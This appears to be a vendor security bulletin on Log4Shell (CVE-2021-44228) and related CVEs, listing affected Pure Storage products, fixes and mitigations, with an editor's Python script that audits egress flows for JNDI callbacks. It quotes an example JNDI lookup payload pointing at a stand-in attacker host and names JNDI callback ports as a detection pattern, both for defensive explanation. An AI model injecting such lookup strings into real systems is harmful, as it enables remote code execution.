Pure Technical Services

Security Bulletin for Log4j/Log4Shell CVE-2021-44228


This is the final statement; it will be updated as necessary and is included in the Pure Community Page. Multiple CVEs related to Log4j / Log4Shell are addressed in this document.

Product Resolution Guides

  • Pure Resolution FAQ
  • Portworx - Log4j Solution
  • FlashArray - Log4j Solution
  • FlashBlade - Log4j Solution
  • CBS - Log4j Solution

CVE-2021-44228 

On December 9, 2021, a critical zero-day vulnerability affecting multiple versions of the popular Apache Log4j 2 logging library was publicly disclosed. If exploited, it can result in Remote Code Execution (RCE): an attacker only has to get an affected installation to log a string containing a JNDI lookup, for example ${jndi:ldap://attacker-host/object}, and Log4j will resolve the lookup, connect to the attacker's server and load code from it.

This vulnerability is being tracked as CVE-2021-44228. As stated in the CVE, "Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints." Applications that are remotely accessible, accept user input, and use Log4j (any version below 2.15.0) to log that input are potentially vulnerable. The CVE also states the following:

Apache Log4j versions prior to 2.15.0 are susceptible to a vulnerability that when successfully exploited could allow an attacker who can control log messages or log message parameters to execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.

Product            CVSS v3.0 Base Score   Vector
FlashArray         9.6                    CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Cloud Block Store  9.6                    CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
FlashBlade         8.4                    CVSS:3.0/AV:A/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Portworx           7.6                    CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

Note: the FlashArray, Cloud Block Store and FlashBlade vectors evaluate to the scores shown. The Portworx vector as printed evaluates to 8.0 under the CVSS v3.0 base-score formula, not 7.6 (the same vector with UI:R scores 7.6); the published score is kept here as-is. The AV:A rating on the array products means exploitation requires access to a network adjacent to the management interface, which is exactly what the mitigations below are intended to deny.

General Mitigation Best Practices

Pure Storage recommends following network security best practices that minimize the risk of compromise due to this vulnerability including, but not limited to:

  • Restrict management interfaces to a trusted set of networks. Please see Best practices on restricting public IP addresses.  Additional security posture hardening may be achieved by restricting all control plane access through a jump box (bastion host).
  • Restrict outbound Internet access to trusted destinations. Phone Home and Remote Assist (RA) only require outbound TCP port 443 (HTTPS) to the CloudAssist subnet 52.40.255.224/27; the only inbound traffic the firewall needs to accept is the return traffic of that established (stateful) connection.
  • Pure Storage strongly encourages the widely-endorsed best practice of highly restricting -- if not blocking altogether -- Internet access to administrative login interfaces, including connections via SSH, TLS, remote consoles, and remote desktop mechanisms.
  • Closely monitor arrays for abnormal or unexpected workload / IO spikes or utilization; these can be a leading indicator of compromise.
  • Enable edge detection/protection mechanisms in the firewall / IDS / IPS systems to detect anomalous access or traffic patterns.
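
The outbound restriction and the monitoring bullets above work together: a successful Log4Shell exploit has to reach back out to the attacker's LDAP, RMI or DNS server, so an array management network that is only permitted to talk to 52.40.255.224/27 on TCP/443 both blocks that callback and makes any attempt stand out in flow logs. The audit below is an editor's example, not a Pure Storage tool: it applies that policy to constructed flow records (timestamp, source, destination, protocol, destination port) and reports every Internet-bound connection from the management network that is not on the allow list, tagging the ports a JNDI callback typically uses. The management network 10.10.1.0/24 and the records are assumptions for the example; 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges standing in for Internet hosts.

```python
import ipaddress
from dataclasses import dataclass
from typing import List, Optional

# Management network(s) whose egress is audited (assumed; substitute your own).
MGMT_NETS = [ipaddress.ip_network("10.10.1.0/24")]

# Destinations that are internal, not Internet, and therefore outside this policy
# (e.g. the directory server an array authenticates against). RFC 1918 only;
# deliberately not ipaddress.is_private, which would also exclude the documentation ranges.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Permitted Internet egress, as stated in the bulletin: Pure CloudAssist on TCP/443 only.
ALLOWED_EGRESS = [(ipaddress.ip_network("52.40.255.224/27"), "tcp", 443)]

# Ports a Log4Shell JNDI callback typically targets: LDAP, LDAPS, RMI and the ad-hoc LDAP port 1389.
JNDI_CALLBACK_PORTS = {389, 636, 1099, 1389}


@dataclass
class Flow:
    ts: str
    src: str
    dst: str
    proto: str
    dport: int


@dataclass
class Violation:
    flow: Flow
    reason: str


def parse_flow(line: str) -> Flow:
    ts, src, dst, proto, dport = line.split()
    return Flow(ts, src, dst, proto.lower(), int(dport))


def _in_any(ip: ipaddress.IPv4Address, nets) -> bool:
    return any(ip in n for n in nets)


def check_flow(flow: Flow) -> Optional[Violation]:
    src = ipaddress.ip_address(flow.src)
    dst = ipaddress.ip_address(flow.dst)
    if not _in_any(src, MGMT_NETS):
        return None  # not a management host; out of scope for this audit
    if _in_any(dst, INTERNAL_NETS):
        return None  # internal traffic is governed elsewhere
    for net, proto, port in ALLOWED_EGRESS:
        if dst in net and flow.proto == proto and flow.dport == port:
            return None
    reason = "Internet egress to a destination/port not on the allow list"
    if flow.dport in JNDI_CALLBACK_PORTS:
        reason += " on a JNDI (LDAP/RMI) port: possible Log4Shell callback"
    return Violation(flow, reason)


def audit(lines) -> List[Violation]:
    return [v for v in (check_flow(parse_flow(l)) for l in lines if l.strip()) if v]


# Constructed flow records: ts src dst proto dport (not from any real device).
SAMPLE_FLOWS = """\
2021-12-10T08:01:02Z 10.10.1.20 52.40.255.230 tcp 443
2021-12-10T08:01:05Z 10.10.1.20 10.10.0.5 tcp 389
2021-12-10T08:02:11Z 10.10.1.20 203.0.113.10 tcp 1389
2021-12-10T08:02:12Z 10.10.1.20 52.40.255.230 tcp 80
2021-12-10T08:03:40Z 10.10.1.21 198.51.100.7 tcp 443
2021-12-10T08:04:00Z 10.10.2.9 203.0.113.10 tcp 1389
""".splitlines()

if __name__ == "__main__":
    for v in audit(SAMPLE_FLOWS):
        print(f"{v.flow.ts} {v.flow.src} -> {v.flow.dst}:{v.flow.dport}/{v.flow.proto}: {v.reason}")
```

Three of the six records are reported: the LDAP callback to 203.0.113.10:1389, the plain-HTTP attempt to the CloudAssist subnet, and an HTTPS connection to an address outside that subnet. The Phone Home connection and the internal LDAP bind are accepted, and the record from 10.10.2.9 is ignored because it is not a management host. The same allow-list tuple is what the egress rule on the firewall should encode; this script is the audit of that rule against what actually left the network.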

Affected Versions

Product Affected Version(s)
FlashArray
  • Purity//FA 6.2.0 - 6.2.3
  • Purity//FA 6.1.0 - 6.1.12
  • Purity//FA 6.0.0 - 6.0.8
  • Purity//FA 5.3.0 - 5.3.17
  • Purity//FA 5.2.x and all prior releases.
FlashBlade
  • Purity//FB 3.3.0
  • Purity//FB 3.2.0 - 3.2.4
  • Purity//FB 3.1.0 - 3.1.11
  • Purity//FB 3.0.x and all prior releases
Cloud Block Store
  • Purity//CBS 6.2.1 and all prior releases
Portworx
  • Portworx 2.8.0 and later running the telemetry CCM service image purestorage/ccm-service at versions 3.0.0-rc1 through 3.0.6.
  • If telemetry has not been enabled in your Portworx cluster, the cluster is not at risk from this vulnerability.
Pure Storage Orchestrator (PSO)
  • NOT affected by CVE-2021-44228, CVE-2021-45046 or CVE-2021-45105.
Pure Storage ActiveCluster On-Premises Mediator
  • NOT affected by CVE-2021-44228, CVE-2021-45046 or CVE-2021-45105.

 

The following fixes are now available.

Product / Type / Version(s) / Notes

FlashArray / Self-Service Patch (Recommended Option)
  • Purity//FA 6.2.x
  • Purity//FA 6.1.x
  • Purity//FA 6.0.x
  • Purity//FA 5.3.x
Online, non-disruptive patch to address the Log4j vulnerability, delivered via Pure1.
See FlashArray - Log4j Solution for more details.

FlashArray / Manual Patch
  • Purity//FA 6.2.x
  • Purity//FA 6.1.x
  • Purity//FA 6.0.x
  • Purity//FA 5.3.x
  • Purity//FA 5.2.x
  • Purity//FA 5.1.x
  • Purity//FA 5.0.x
Online, non-disruptive patch to address the Log4j vulnerability, administered by Pure Storage Global Technical Services.

FlashArray / Purity Upgrade / All
Upgrades to the following versions of Purity//FA contain a permanent fix for Log4j:

Cloud Block Store / Purity Upgrade / All
Upgrades to the following versions contain a permanent fix for Log4j:
  • Purity//CBS 6.2.4PAWS
  • Purity//CBS 6.2.4PAZ
  • Purity//CBS 6.1.13PAWS
  • Purity//CBS 6.1.13PAZ
See CBS - Log4j Solution for more details.

FlashBlade / Self-Service Patch (Recommended Option)
  • Purity//FB 3.3.x
  • Purity//FB 3.2.x
  • Purity//FB 3.1.x
  • Purity//FB 3.0.x
Online, non-disruptive patch to address the Log4j vulnerability, delivered via Pure1.
See FlashBlade - Log4j Solution for more details.

FlashBlade / Manual Patch
  • Purity//FB 3.3.x
  • Purity//FB 3.2.x
  • Purity//FB 3.1.x
  • Purity//FB 3.0.x
Online, non-disruptive patch to address the Log4j vulnerability, administered by Pure Storage Global Technical Services.

FlashBlade / Purity Upgrade / All
Upgrades to the following versions of Purity//FB contain a permanent fix for Log4j:

Portworx / CCM Service Upgrade
Portworx CCM container release incorporating Apache Log4j v2.16.0 (fixes in ccm-service:3.0.8).
See Portworx - Log4j Solution for more details.

Pure VM Analytics OVA Collector / Upgrade
VMA collector v3.1.4 with the fixes is now available. Please refer to Upgrading Collectors for additional details.

Pure1 / N/A / N/A
Pure1 infrastructure has been successfully updated with the appropriate fixes.

 

CVE-2021-45046 

On Tuesday 14 December 2021, CVE-2021-45046 was published. It was found that the fix for CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations.

Pure Storage has completed evaluating implications of CVE-2021-45046 against all products.  

  • FlashBlade, FlashArray, Cloud Block Store are not affected by CVE-2021-45046.
  • Portworx: not affected by CVE-2021-45046. Nevertheless, a Portworx CCM container release incorporating Apache Log4j v2.16.0 (fixes in ccm-service:3.0.8) is now available.
  • Pure VM Analytics OVA Collector:  VMA collector (v3.1.4) is now GA. New VM Analytics Collector OVA installations and upgrades will automatically receive VMA collector v3.1.4 which includes CCM v1.8.6 incorporating Apache Log4j v2.16.0 - Instructions For Updating Pure VMC OVA Collector.   (NOTE:  3.3.1 is the common OVA version. Once installed, it will download the VMA collector version 3.1.4).

CVE-2021-45105

Pure Storage is aware of the Apache Security Vulnerability CVE-2021-45105 posted Saturday, 18-DEC-2021.  Pure Storage has assessed all Pure product families against this vulnerability.  FlashArray, FlashBlade, Cloud Block Store, Portworx, Pure1, and VM Analytics Collector are not affected by this vulnerability.

CVE-2021-44832

Pure Storage is aware of the Apache Security Vulnerability CVE-2021-44832 posted Monday, 27-DEC-2021.  Pure Storage has assessed all Pure product families against this vulnerability.  FlashArray, FlashBlade, Cloud Block Store, Portworx, Pure1, and VM Analytics Collector are not affected by this vulnerability.

Contacting Support

If you would like one of our engineers to assist you with this issue please call +1(866) 244-7121.  If calling from outside the US here is a list of phone numbers:  https://support.purestorage.com/Pure1/Support.